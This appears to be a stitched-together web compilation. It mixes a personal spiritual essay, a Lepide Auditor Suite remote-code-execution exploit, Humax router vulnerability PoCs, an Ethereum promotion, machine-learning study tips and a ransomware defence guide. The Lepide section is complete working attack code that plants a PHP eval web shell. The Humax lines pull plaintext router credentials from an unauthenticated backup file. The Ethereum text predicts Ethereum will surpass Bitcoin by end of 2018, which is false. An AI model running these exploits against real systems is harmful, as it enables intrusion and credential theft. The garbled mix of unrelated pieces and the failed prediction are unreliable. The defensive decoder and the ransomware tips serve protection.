Something, sometimes freaks me out. Sometime, every time, having myself cut out from my own being. So many people around, family, friends and everything else of any meaning turns out to be useless in face of what comes at you. That’s when you feel alone. Completely alone, circumvent and carved out into the middle. All that everyone can do is look at you. The success you’ve made always seems little to suffice the unending torrents of this sharking world and success cannot put a lid to what a heart wants. And, you got nothing to put your back against. It is all lonely here. No one to whom you could peel off your heart, layer by layer, until it feels fulfilling and complete. This is not about a girlfriend, it is just someone who can absorb the burning metal waste that every heart makes living in this nasty world. I look around and see, some people have not much money, not much talented, not very extraordinary, but they got this someone, and I see myself like a deadwood of sorts, living like a machine, and no machine ever lives, it runs. These fellas I envy. I have missed out. Allah up there, this post is for you! I wrote this on my computer, take it as a prayer. You know what I need. Will put it in my DP, I really got some good friends, they may pray for me too.

Wrote the above para last night. I thought that would be it but no. As Ghalib said, “all my paper is used up, and much of the trouble remains / to finish up with me troubles is to voyage a shoreless sea”.

Alright then. Let’s roll.

On the dirt road, towards the depths of hell, there lies at the end the gateway to heaven. We must pass through this dirt road in order to have a glimpse of the gateway. This road is grained with different kinds of people, a thousand situations and a ton of obstacles. All they want is not to let you pass through. Keep you pinned down. Annihilate your resolve. Obliterate your will. It makes you forget who you are. It hardly cares about the toughness in you. What do you do? You must be an extremist of passion. I give up on those who give up on me. I need someone. And if there is none, there’s no need. I am my own champion.

Will add more to this post, since it is a shoreless sea.

Bon voyage.

From a life, that’s full—full of buzzing tasks, full of lulling relations and friends, full of dreams and vacant before goals. Everything is done yet all remains unfinished. In this state of affairs, making the heart skip a beat and using that moment to be unknown again—without a name or an identity. Falling on my back this moment, I see we’re all born the same—unfettered by preconceived limitations. Born free, with a choice to be slaves of ourselves or not. Eventually, to give in to the innate limitations of being blood, flesh and bones—we conform—we live the life of a world which is far lesser than what we are—hollow in the meaning of its traditions—foolish in ethnicities—irrational in its logic—meaningless in what it seeks of us. It doesn’t connect with who we all are and chaos breaks out.  We don’t end the chaos because we can’t —the only way to get out of it is to get out of here—transform—to be what we are, the spirit or the soul. That thing which doesn’t know how to count money but grows fonder of counting stars. The thing that loves that a dog just as one would love one’s own face. The thing that smiles at what makes our bodies angry.


#!/usr/bin/python
"""
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/

Summary:
========

The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.

Additional code:
================

When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:

root@kali:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys

if len(sys.argv) < 3:
    print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
    sys.exit(-1)

target = sys.argv[1]
server = sys.argv[2]

s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data={'servername': server, 'username': 'whateva', 'password': 'thisisajoke!', 'submit': ''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params={'path': 'lol', 'daterange': '2@3', 'id': '6'})

Example:
========

root@kali:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016

(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: 1@9 - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();

In another console:

root@kali:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""
import struct
import socket
from thread import start_new_thread

# request codes the web console sends to the "server" it was pointed at
LOGIN = 601
COLUMN = 604
FILENAME = 603

# protocol control values
VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"

def get_string(conn):
    # strings on the wire are a big-endian int32 length followed by UTF-16 data;
    # every received string is acknowledged with VALID
    size = struct.unpack(">i", conn.recv(4))[0]
    data = conn.recv(size).decode("utf-16")
    conn.send(struct.pack(">i", VALID))
    return data

def send_string(conn, string):
    size = len(string.encode("utf-16-le"))
    conn.send(struct.pack(">i", size))
    conn.send(string.encode("utf-16-le"))
    return struct.unpack(">i", conn.recv(4))[0]

def send_tag(conn, tag):
    conn.send(struct.pack(">i", TAGR))
    conn.send(struct.pack(">i", tag))
    return struct.unpack(">i", conn.recv(4))[0]

def send_file(conn, filedata):
    if send_tag(conn, FILEN) == 2:
        print "(+) successfully sent tag"

        # send length of file
        conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))

        # send the malicious payload
        conn.send(filedata.encode("utf-16-le"))
        if struct.unpack(">i", conn.recv(4))[0] == 2:
            print "(+) successfully sent file!"
            if send_tag(conn, VALID) == 2:
                return True
    return False

def client_thread(conn, addr):
    """
    Let's put it this way, my mum's not proud of my code.
    """
    while True:
        data = conn.recv(4)
        if not data:
            # peer closed the connection
            break
        resp = struct.unpack(">i", data)[0]
        if resp == 4:
            code = conn.recv(resp)
            resp = struct.unpack(">i", code)[0]

            # stage 1
            if resp == LOGIN:
                print "(+) got a login request"

                # send a VALID response back
                conn.send(struct.pack(">i", VALID))

                # now we expect to get the username and password
                print "(+) got a username: %s" % get_string(conn)
                print "(+) got a password: %s" % get_string(conn)

                # now we try to send a success packet
                print "(+) sending SUCCESS packet"
                if send_string(conn, SUCCESS) == 2:
                    print "(+) send string successful"

            # stage 2
            elif resp == COLUMN:
                print "(+) got a column request"

                # send a VALID response back
                conn.send(struct.pack(">i", VALID))
                print "(+) got http request id: %s" % get_string(conn)
                print "(+) got http request path: %s" % get_string(conn)
                if send_string(conn, "foo-bar") == 2:
                    print "(+) send string successful"

            # stage 3 - this is where the exploitation is
            elif resp == FILENAME:
                print "(+) got a filename request"
                conn.send(struct.pack(">i", VALID))

                # now we read back 3 strings...
                print "(+) got http request daterange: %s" % get_string(conn)
                print "(+) got http request id: %s" % get_string(conn)
                print "(+) got http request path: %s" % get_string(conn)

                # exploit!
                if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
                    print "(+) file sent successfully"
                    print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
                break
    conn.close()

HOST = '0.0.0.0'
PORT = 1056

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)

print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."
while True:

    # blocking call, waits to accept a connection
    conn, addr = s.accept()
    print '(+) connected by %s' % (addr,)
    start_new_thread(client_thread, (conn, addr))
s.close()
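Added here as a defender-side example, not part of mr_me's advisory: a decoder for the server-to-client frames of the FILENAME stage of the custom protocol described above (big-endian int32 words, UTF-16-LE payloads, TAGR/FILEN framing), which flags file payloads carrying SQL `INTO OUTFILE` or PHP code. The sample streams are constructed; the frame encoder only mirrors the advisory's `send_file()` so the test input matches what a rogue server would emit.

```python
import re
import struct

# Protocol control values as documented in the advisory above.
VALID = 2   # acknowledgement / "valid" marker
TAGR = 4    # "a tag follows" marker
FILEN = 5   # tag: a length-prefixed file payload follows

# Indicators of a SQL-to-disk write or PHP source inside the pushed "file".
SUSPICIOUS = re.compile(r"into\s+outfile|<\?php|eval\s*\(", re.IGNORECASE)


def parse_server_frames(stream):
    """Walk the server->client byte stream of the FILENAME stage.

    Returns a list of frames: ('int', n) for a bare int32 word,
    ('tag', n) for TAGR followed by a non-file tag, and ('file', text)
    for TAGR, FILEN, int32 length, UTF-16-LE payload.  Client-side acks
    travel in the other direction and are not part of this stream.
    """
    frames = []
    off = 0
    while off + 4 <= len(stream):
        (word,) = struct.unpack(">i", stream[off:off + 4])
        off += 4
        if word != TAGR:
            frames.append(("int", word))
            continue
        (tag,) = struct.unpack(">i", stream[off:off + 4])
        off += 4
        if tag != FILEN:
            frames.append(("tag", tag))
            continue
        (size,) = struct.unpack(">i", stream[off:off + 4])
        off += 4
        raw = stream[off:off + size]
        off += size
        if len(raw) != size:
            raise ValueError("truncated file payload")
        frames.append(("file", raw.decode("utf-16-le", errors="replace")))
    return frames


def flag_file_payloads(stream):
    """Return the decoded file payloads that match the SUSPICIOUS pattern."""
    return [text for kind, text in parse_server_frames(stream)
            if kind == "file" and SUSPICIOUS.search(text)]


def encode_file_frame(text):
    """Build TAGR, FILEN, length, UTF-16-LE payload (mirrors send_file())."""
    body = text.encode("utf-16-le")
    return (struct.pack(">i", TAGR) + struct.pack(">i", FILEN)
            + struct.pack(">i", len(body)) + body)


# Constructed sample streams: one harmless report, one SQL write to the web root
# (a shortened stand-in for the advisory's payload), each followed by the
# closing TAGR, VALID pair that send_file() emits.
TRAILER = struct.pack(">i", TAGR) + struct.pack(">i", VALID)
BENIGN = encode_file_frame("monthly audit report") + TRAILER
MALICIOUS = encode_file_frame(
    "select '<?php echo 1; ?>' into outfile '../../www/x.php';") + TRAILER

if __name__ == "__main__":
    for name, stream in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(name, parse_server_frames(stream), flag_file_payloads(stream))
```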

It's common for modern browser exploits to try to turn a memory safety vulnerability into a way of running arbitrary native code on the target device. Attackers favour this approach because it reaches their goal with the least resistance.
Steps to safeguard from Remote Code Execution
Microsoft has been fighting web browser vulnerabilities with a systematic approach that aims at eliminating entire classes of vulnerability. The first step is to think like an attacker and work out the steps used to exploit a vulnerability. This gives defenders more control and helps them block the attack more effectively. Vulnerability classes are eliminated by reducing the attack surface and by applying specific mitigation patterns.
Break the Techniques and Contain damage
As explained above, to combat attackers one needs to think like them and work out their techniques. That said, it is safe to assume that not every technique can be broken, so the next step is to contain the damage on a device once a vulnerability has been exploited.
Here the tactics are directed at the attack surface reachable from code running inside Microsoft Edge's browser sandbox. A sandbox is a restricted environment that limits what the code running inside it can reach on the rest of the system.
Limit the windows of opportunity
This is a contingency plan for when all the other methods have failed: one needs to limit the attackers' window of opportunity with powerful and efficient tools. Incidents can be reported to the Microsoft Security Response Center, and technologies such as Windows Defender and SmartScreen are usually effective at blocking malicious URLs. CIG and ACG together prove extremely effective against these exploits, which means attackers must now find new ways to get around the layer of protection that CIG and ACG provide.
Arbitrary Code Guard & Code Integrity Guard
Microsoft counters these exploits with ACG (Arbitrary Code Guard) and CIG (Code Integrity Guard), both of which help prevent malicious code from being loaded into memory. Microsoft Edge already uses ACG and CIG to thwart exploitation attempts.

If you are a developer, there are many ways to safeguard your code against such exploits. Make sure your code stays within the bounds of its data buffers, and never trust user-supplied data. Always assume the worst case and build the program to handle it; in other words, be a defensive programmer.


Humax Digital HG100R multiple vulnerabilities
Device: Humax HG100R
Software Version: VER 2.0.6

– Backup file download (CVE-2017-7315)
An issue was discovered on Humax Digital HG100R 2.0.6 devices, a modem commonly used by ISPs to provide ADSL internet service to household and small business users.
Downloading the backup file requires no credentials or any other authentication, and the router credentials are stored in plaintext inside the backup.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 admin
——————————————————————————–

– XSS Reflected (CVE-2017-7316)
An issue was discovered on Humax Digital HG100R 2.0.6 devices.
There is reflected XSS on the 404 page.

PoC
http://192.168.0.1alert('XSS')
——————————————————————————–

– Default credentials to router's web application not declared in the manual (CVE-2017-7317)
An issue was discovered on Humax Digital HG100 2.0.6 devices.
The attacker can find the root credentials in the backup file.

PoC
wget http://192.168.0.1/view/basic/GatewaySettings.bin
strings GatewaySettings.bin | grep -A 1 root

Timeline
2017-03-15 – First contact. Ignored by the vendor.
2017-03-21 – Second contact.
2017-03-22 – The vendor answered asking about the vulnerability.
2017-03-27 – Asked the vendor for their security team's contact information to report the vulnerability.
2017-03-28 – The vendor answered saying that it is an old product, and that they will check these vulnerabilities in the new products.
2017-03-28 – Asked the vendor about a patch.
2017-03-30 – Asked the vendor again about the patch.
2017-04-03 – Notified the vendor about the disclosure after 90 days, even without a patch.
2017-04-19 – Asked the vendor about a patch.
2017-05-08 – Asked the vendor about a patch.
2017-06-29 – Disclosure.


Ethereum – the cryptocurrency created in 2013 – has been a story of success in the crypto world. Some key events marked its ascendancy. Key technological innovations at the right time consolidated huge competitive advantages when compared to other cryptocurrencies, and in periods of crisis this coin emerged even stronger.

Since the beginning and because of the successive successes of the project, Ethereum has had media coverage that further galvanized public awareness to the coin. Another relevant support came from the financial industry itself when it came to accept Ethereum as a new form of investment.

Major brokerage firms started expanding their offer by introducing Ethereum on their platforms. Ethereum trading was born. Also contributing to the emergence of Ethereum was the support of major companies such as Microsoft, Intel and JPMorgan Chase. Finally, governments further legitimized the coin by considering it a credible instrument of exchange that needs to be regulated.

Ethereum was therefore not only able to introduce technical and technological innovations in a very competitive space, but also to create the conditions to emerge stronger in moments of crisis. These two factors go hand in hand and are leading to major changes in the cryptocurrency market.

Because of its achievements Ethereum is challenging the predominant cryptocurrency: Bitcoin. And in our opinion, it will surpass Bitcoin by the end of 2018 – if not sooner.

We will trace this story of success in our infographic. In it we will identify key events that marked the ascendancy of this cryptocurrency. You will also understand why Ethereum is set to overtake Bitcoin by the end of 2018. This isn’t a fact but it’s a clear tendency. And the market itself is supporting this transformation: since the beginning of 2017, and at its peak, Ethereum registered a 5001% growth. Find the reasons why…


No plagiarism here. This article is bot picked from themerkle

All the programming you'd need to perform strictly machine learning related tasks you can learn "on the job". Programming and thinking like a computer scientist are valuable skills on their own, and I think everyone should introduce themselves to these concepts. Since AI is what you're shooting for, you shouldn't spend too much time learning pure CS/programming — there's so much information in that field that you might get needlessly bogged down trying to master the concepts.
Getting comfortable with a single language is sufficient for now (you can pick up more later easily if necessary) — I recommend Python as it’s the standard tool for machine learning engineers. It’s also the easiest language to learn and is very general.
Codecademy’s Python course will give you a speedy introduction to the language’s syntax, but will do very little for you in terms of CS thinking/problem solving skill development and exposing you to deeper language features. As I said before, since AI is your focus you can learn that stuff as you go.
Right away, you can look into these videos/courses to begin developing a foundation in machine learning concepts. I’d start with Andrew Ng’s Coursera course.
Straight into deep learning.
Great overview of many machine learning topics.
More in-depth and less hands-on neural networks.
Haven’t taken this one yet, but I’m planning on doing so soon.

First up, let's understand what ransomware is.

Ransomware is a type of malicious software that blocks access to the victim's data and threatens to publish or delete it until a ransom is paid. The payment is usually demanded in Bitcoin, since it helps the attacker remain anonymous and there is no chance of a chargeback.

Who can be targeted?

Just about anyone can be targeted. Most of the times intentionally, sometimes unintentionally. It can happen to someone in Kashmir or the United States, organisations or individuals, all are vulnerable.

To Kashmiri internet users it can usually happen by downloading ransomware payloads disguised as free mp3 songs or apk files or other supposedly free stuff. This kind of infection is not targeted in nature, it can well be the handiwork of a script kiddie.

How does ransomware work?

That's a hard question, as it varies from one version of ransomware to another. But all of them follow a basic game plan. I will divide it into 5 phases below:

________________________________________________________________________________

Phase 1: Exploitation and Infection (T –00:00)

In order for an attack to be successful, the malicious ransomware file needs to execute on a computer. This is often done through a phishing email or an exploit kit. In the case of the CryptoLocker malware, the Angler Exploit Kit is a preferred method to gain execution.

Phase 2: Delivery and Execution (T –00:05)

During this phase, the actual ransomware executables are delivered to the victim’s system. Upon execution, persistence mechanisms will be put into place.

Phase 3: Backup Spoliation (T –00:10)

A few seconds later, the ransomware targets the backup files and folders on the victim’s system and removes them to prevent restoring from backup. This is unique to ransomware—other types of crimeware don’t bother to delete backup files.

Phase 4: File Encryption (T –02:00)

Once the backups are completely removed, the malware will perform a secure key exchange with the command and control (C2) server, establishing those encryption keys that will be used on the local system.

Phase 5: User Notification and Cleanup (T –15:00)

With the backup files removed and the encryption dirty work done, the demand instructions for extortion and payment are presented. Quite often, the victim is given a few days to pay. After that time, the ransom increases.

________________________________________________________________________________

Finally, like the Mission Impossible recordings that self destruct, the malware cleans itself off the system so as not to leave behind significant forensic evidence that would help to build better defenses against the malware.

Ransomware attacks are just starting to ramp up. Because these attacks are so lucrative for the perpetrators, they are certain to become more common, more damaging and more expensive.

Your success in defending against a ransomware attack is largely dependent on your level of preparation and the tools you deploy to monitor your systems to detect, respond to and neutralize suspicious activity.

Now, you have a basic understanding. You can follow the tips below to have a certain degree of defence against ransomware:

1. Back up your data

The single biggest thing that will defeat ransomware is having a regularly updated backup. If you are attacked with ransomware you may lose that document you started earlier this morning, but if you can restore your system to an earlier snapshot or clean up your machine and restore your other lost documents from backup, you can rest easy. Remember that ransomware typically will also encrypt files on drives that are mapped. This includes any external drives such as a USB thumb drive, as well as any network or cloud file stores that you have assigned a drive letter. So, what you need is a regular backup regimen, to an external drive or backup service, one that is not assigned a drive letter or is disconnected when it is not doing backup.

The next three tips are meant to deal with how ransomware has been behaving – this may not be the case forever, but these tips can help increase your overall security in small ways that help prevent against a number of different common malware techniques.

2. Show hidden file-extensions

One way that ransomware frequently arrives is in a file named with the extension ".PDF.EXE", counting on Windows' default behavior of hiding known file extensions. If you re-enable the ability to see the full file extension, it can be easier to spot suspicious files.

3. Filter EXEs in email

If your gateway mail scanner has the ability to filter files by extension, you may wish to deny mails sent with “.EXE” files, or to deny mails sent with files that have two file extensions, the last one being executable (“*.*.EXE” files, in filter-speak). If you do legitimately need to exchange executable files within your environment and are denying emails with “.EXE” files, you can do so with ZIP files (password-protected, of course) or via cloud services.
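Added here as an illustration of tips 2 and 3, not code from the original article: a small attachment-name triage that applies the two filter rules just described (deny `.EXE`, deny `*.*.EXE`) and shows what Explorer would display for such a name with known extensions hidden. The extension set beyond `.EXE` and the sample attachment names are my own constructed assumptions.

```python
import os

# Extensions the gateway treats as executable. The article names only .EXE;
# the others are an assumption, commonly grouped with it in mail filters.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}


def as_shown_with_hidden_extensions(filename):
    """What Explorer displays with 'hide extensions for known file types' on:
    only the final extension is dropped, so 'invoice.pdf.exe' reads 'invoice.pdf'."""
    stem, ext = os.path.splitext(filename)
    return stem if ext else filename


def attachment_verdict(filename):
    """Return ('deny', reason) or ('allow', '') for one attachment name,
    applying the two rules from the text: deny .EXE and deny *.*.EXE."""
    name = filename.strip().lower()
    stem, last = os.path.splitext(name)
    if last not in EXECUTABLE_EXTS:
        return ("allow", "")
    _, inner = os.path.splitext(stem)
    if inner:
        shown = as_shown_with_hidden_extensions(filename.strip())
        return ("deny", "double extension %s%s (displayed as '%s')" % (inner, last, shown))
    return ("deny", "executable attachment %s" % last)


def denied_attachments(names):
    """Names from `names` that the gateway rules would block, in order."""
    return [n for n in names if attachment_verdict(n)[0] == "deny"]


# Constructed sample attachment names for a mail with several parts.
SAMPLE_ATTACHMENTS = [
    "Quarterly Report.docx",
    "invoice.pdf.exe",
    "setup.EXE",
    "photo.jpg",
    "archive.zip",          # tip 3: zips (password-protected) are the escape hatch
    "notes.txt.vbs ",       # trailing space, double extension
]

if __name__ == "__main__":
    for name in SAMPLE_ATTACHMENTS:
        print("%-24r %s" % (name, attachment_verdict(name)))
```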

4. Disable files running from AppData/LocalAppData folders

You can create rules within Windows or with Intrusion Prevention Software, to disallow a particular, notable behavior used by ransomware, which is to run its executable from the App Data or Local App Data folders. If (for some reason) you have legitimate software that you know is set to run not from the usual Program Files area but the App Data area, you will need to exclude it from this rule.

5. Use the ransomware Prevention Kit

The ransomware Prevention Kit is a tool created by Third Tier that automates the process of making a Group Policy to disable files running from the App Data and Local App Data folders, as well as disabling executable files from running from the Temp directory of various unzipping utilities. This tool is updated as new techniques are discovered for ransomware, so you will want to check in periodically to make sure you have the latest version. If you need to create exemptions to these rules, they provide this document that explains that process.

6. Disable RDP

The ransomware/Filecoder malware often accesses target machines using Remote Desktop Protocol (RDP), a Windows utility that allows others to access your desktop remotely. If you do not require the use of RDP, you can disable RDP to protect your machine from Filecoder and other RDP exploits. For instructions to do so, visit the appropriate Microsoft Knowledge Base article below:

7. Patch or Update your software

These next two tips are more general malware-related advice, which applies equally to ransomware as to any malware threat. Malware authors frequently rely on people running outdated software with known vulnerabilities, which they can exploit to silently get onto your system. It can significantly decrease the potential for ransomware-pain if you make a practice of updating your software often. Some vendors release security updates on a regular basis (Microsoft and Adobe both use the second Tuesday of the month), but there are often “out-of-band” or unscheduled updates in case of emergency. Enable automatic updates if you can, or go directly to the software vendor’s website, as malware authors like to disguise their creations as software update notifications too.

8. Use a reputable security suite

It is always a good idea to have both anti-malware software and a software firewall to help you identify threats or suspicious behavior. Malware authors frequently send out new variants, to try to avoid detection, so this is why it is important to have both layers of protection. And at this point, most malware relies on remote instructions to carry out their misdeeds. If you run across a ransomware variant that is so new that it gets past anti-malware software, it may still be caught by a firewall when it attempts to connect with its Command and Control (C&C) server to receive instructions for encrypting your files.

If you find yourself in a position where you have already run a ransomware file without having taken any of the previous precautions, your options are quite a bit more limited. But all may not be lost. There are a few things you can do that might help mitigate the damage, depending on the ransomware in question:

9. Disconnect from WiFi or unplug from the network immediately

If you run a file that you suspect may be ransomware, but you have not yet seen the characteristic ransomware screen, acting very quickly might let you stop communication with the C&C server before it finishes encrypting your files. If you disconnect yourself from the network immediately (have I stressed enough that this must be done right away?), you might mitigate the damage. It takes some time to encrypt all your files, so you may be able to stop it before it succeeds in garbling them all. This technique is definitely not foolproof, and you might not be sufficiently lucky or able to move more quickly than the malware, but disconnecting from the network may be better than doing nothing.

10. Use System Restore to get back to a known-clean state

If you have System Restore enabled on your Windows machine, you might be able to take your system back to a known-clean state. But, again, you have to out-smart the malware. Newer versions of ransomware can delete "Shadow" files from System Restore, which means those files will not be there when you try to replace your malware-damaged versions. Ransomware will start the deletion process whenever an executable file is run, so you will need to move very quickly, as executables may be started as part of an automated process. That is to say, executable files may be run without you knowing, as a normal part of your Windows system's operation.

11. Set the BIOS clock back

Most ransomware has a payment timer that is generally set to 72 hours, after which time the price for your decryption key goes up significantly. (The price may vary as Bitcoin has a fairly volatile value. At the time of writing the initial price was .5 Bitcoin or $300, which then goes up to 4 Bitcoin) You can “beat the clock” somewhat, by setting the BIOS clock back to a time before the 72 hour window is up. I give this advice reluctantly, as all it can do is keep you from having to pay the higher price, and I strongly advise that you do not pay the ransom. Paying the criminals may get your data back, but there have been plenty of cases where the decryption key never arrived or where it failed to properly decrypt the files. Plus, it encourages criminal behavior! Ransoming anything is not a legitimate business practice, and the malware authors are under no obligation to do as promised – they can take your money and provide nothing in return, because there is no backlash if the criminals fail to deliver.